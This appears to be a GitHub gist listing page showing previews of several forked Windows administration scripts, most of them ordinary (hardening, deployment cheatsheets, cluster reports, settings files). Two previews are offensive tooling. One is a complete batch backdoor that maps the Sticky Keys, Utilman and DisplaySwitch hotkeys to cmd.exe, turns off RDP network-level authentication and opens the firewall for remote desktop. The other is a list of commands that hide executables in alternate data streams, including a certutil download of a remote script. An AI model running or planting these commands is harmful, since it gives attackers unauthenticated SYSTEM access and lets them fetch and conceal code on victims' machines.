Kurt De Greeff KurtDeGreeff
KurtDeGreeff
/ windows_hardening.cmd
Created
November 21, 2022 10:23
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Windows 10 Hardening Script | |
| :: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. | |
| :: Obligatory 'views are my own'. :) | |
| :: Thank you @jaredhaight for the Win Firewall config recommendations! | |
| :: Thank you @ricardojba for the DLL Safe Order Search reg key! | |
| :: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings! | |
| :: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater | |
| : |
KurtDeGreeff
/ PSADT-Cheatsheet.ps1
Created
September 18, 2022 07:44
— forked from leeramsay/PSADT-Cheatsheet.ps1
PSADT snippits/cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Commonly used PSADT env variables | |
| $envCommonDesktop # C:\Users\Public\Desktop | |
| $envCommonStartMenuPrograms # C:\ProgramData\Microsoft\Windows\Start Menu\Programs | |
| $envProgramFiles # C:\Program Files | |
| $envProgramFilesX86 # C:\Program Files (x86) | |
| $envProgramData # c:\ProgramData | |
| $envUserDesktop # c:\Users\{user currently logged in}\Desktop | |
| $envUserStartMenuPrograms # c:\Users\{user currently logged in}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | |
| $envSystemDrive # c: | |
| $envWinDir # c:\windows |
KurtDeGreeff
/ clusterValidationReport.ps1
Created
February 9, 2020 17:04
— forked from rchaganti/clusterValidationReport.ps1
Parses the XML validation report from Test-Cluster into a PowerShell Object
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory = $true)] | |
| [String] | |
| $ValidationXmlPath | |
| ) | |
| $xml = [xml](Get-Content -Path $ValidationXmlPath) | |
| $channels = $xml.Report.Channel.Channel |
KurtDeGreeff
/ sticky_keys_persitence.bat
Created
February 4, 2020 13:08
— forked from ahhh/sticky_keys_persitence.bat
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
| netsh firewall set service type = remotedesktop mode = enable | |
| netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
| net start TermService |
KurtDeGreeff
/ Get-CMClientExecutionHistory.ps1
Created
January 27, 2020 17:33
— forked from SMSAgentSoftware/Get-CMClientExecutionHistory.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [CmdletBinding()] | |
| Param | |
| ( | |
| [Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$true)] | |
| [string[]]$ComputerName = $env:COMPUTERNAME | |
| ) | |
| Begin | |
| { |
KurtDeGreeff
/ settings.json
Created
November 23, 2019 19:51
— forked from chrisdias/settings.json
Chris Dias' settings.json for VS Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| /* | |
| USER (GLOBAL) SETTINGS | |
| ~/Library/Application Support/Code-Insiders/User/settings.json | |
| */ | |
| /* | |
| *************** | |
| *** WARM UP *** | |
| *************** |
KurtDeGreeff
/ Save-KBFile.ps1
Created
July 11, 2019 18:05
— forked from potatoqualitee/Save-KBFile.ps1
Download Windows patch files / KB (patchid like KBxxxxx) and save them to disk using PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Save-KBFile { | |
| <# | |
| .SYNOPSIS | |
| Downloads patches from Microsoft | |
| .DESCRIPTION | |
| Downloads patches from Microsoft | |
| .PARAMETER Name | |
| The KB name or number. For example, KB4057119 or 4057119. |
KurtDeGreeff
/ Uninstall-Pester.ps1
Created
March 20, 2019 08:10
— forked from nohwnd/Uninstall-Pester.ps1
Remove built-in version of Pester on Windows 10, and all other versions of Pester
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -RunAsAdministrator | |
| $modulePath = "C:\Program Files\WindowsPowerShell\Modules\Pester" | |
| if (-not (Test-Path $modulePath)) { | |
| "There is no Pester folder in $modulePath, doing nothing." | |
| break | |
| } | |
| takeown /F $modulePath /A /R | |
| icacls $modulePath /reset |
KurtDeGreeff
/ ntfspermissions.ps1
Created
March 7, 2019 12:52
— forked from johannbelau/ntfspermissions.ps1
Managing NTFS folder security with PowerShell module NTFSSecurity
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #First, show the script which directory | |
| $directory = "\\<HOST>\<Dir>\" | |
| #[Optional!] Inside the directory defined above filter for folders you want to check | |
| $folders = Get-ChildItem $Directory -Directory | Where-Object { $_.Name -like "XXXX??" } | |
| #now go through each folder in that directory | |
| foreach ($folder in $folders) | |
| { | |
| Write-Host $folder |
KurtDeGreeff
/ Exe_ADS_Methods.txt
Created
March 6, 2019 18:56
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
NewerOlder